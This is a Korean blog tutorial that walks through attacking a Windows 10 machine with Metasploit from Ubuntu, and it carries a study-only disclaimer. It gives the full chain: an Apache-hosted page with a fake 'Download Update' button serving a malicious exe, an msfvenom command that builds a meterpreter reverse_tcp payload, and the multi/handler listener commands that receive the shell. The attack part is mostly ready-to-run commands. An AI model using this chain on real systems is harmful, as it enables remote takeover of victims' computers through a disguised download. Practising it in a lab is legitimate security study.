[LINUX] 우분투에서 Metasploit을 이용하여 윈도우10 모의해킹하기 Windows 10 Penetration Testing Using Metasploit on Ubuntu

이미지 출처 : https://pixabay.com/ko/vectors/%eb%aa%a8%eb%8b%88%ed%84%b0-%eb%8d%b0%ec%8a%a4%ed%81%ac%ed%83%91-24%ec%9d%b8%ec%b9%98-1135350/

https://pixabay.com/ko/illustrations/%ed%95%b4%ed%82%b9-%ec%82%ac%ec%9d%b4%eb%b2%84-%eb%b2%94%ec%a3%84-%ec%bb%b4%ed%93%a8%ed%84%b0-2127635/

자 오늘은 Metasploit을 해볼까 합니다.

우선 보여드리기 전에 말씀 드릴게 있습니다.

해킹은 절대로 어디서든 누구에게든 절대로 남용하지 마시고

모의해킹으로만 공부로만 가상에만 하세요.

절대로 악용해서는 안됩니다. 공부용으로만 하시길 바랍니다!!

Metasploit 참고 링크

우분투에 Metasploit 설치 : https://www.bddungsblog.com/2021/02/ubuntu-metasploit-macos-how-to-install.html

Kali Linux WSL에 Metasploit 설치 : https://www.bddungsblog.com/2021/01/metasploit-how-to-install-metasploit-on.html

Metasploit Tools : https://www.metasploit.com/

Metasploit on Kali Linux 설명 : https://www.kali.org/tools/metasploit-framework/

Ubuntu에서도 되지만 당연히 Kali Linux에서도 됩니다. Debian Linux에서도..

오늘은 윈도우10을 해킹해볼려고 합니다.

우선 악성 파일을 옮기는 것보다는 서버를 열어 웹에서 파일을 다운을 할 수 있게 만들겁니다.

서버는 apache를 이용할게요.

apache2 패키지를 설치해주세요.

설치 전 패키지 업데이트 명령어 "sudo apt update" 먼저 해주는거 필수!!

1
sudo apt install apache2
cs

설치 후 html 폴더 가주시고 apache2 서버도 시작해주세요.

root 계정 들어가주시고 index.html 파일을 vi 에디터로 열어주시고

파일 다운할 수 있게 html 수정해주세요.

제꺼 보고 따라하셔도 됩니다.

밑에 "/bddung.exe"는 곳에는 exe 파일 있는 위치 적어주시면 됩니다.

1
2
3
4
5
6
7
8
<!DOCTYPE html>
<html>
<body>
<title>BDDUNG</title>
<p>Never Download file</p>
<input align="center" type = "button" value="Download Update" onclick="window.open('/bddung.exe')">
</body>
</html>
Colored by Color Scripter
cs

exe 파일을 악성 실행 파일로 만들어줄게요.

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=4444 -f exe -o bddung.exe
cs

이젠 Metasploit을 실행해줄게요. 작성한 명령어들을 아래에 모아둘게요.

1
2
3
4
5
6
msfconsole
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ip{ex) 192.168.0.1}
set LPORT 4444
exploit
Colored by Color Scripter
cs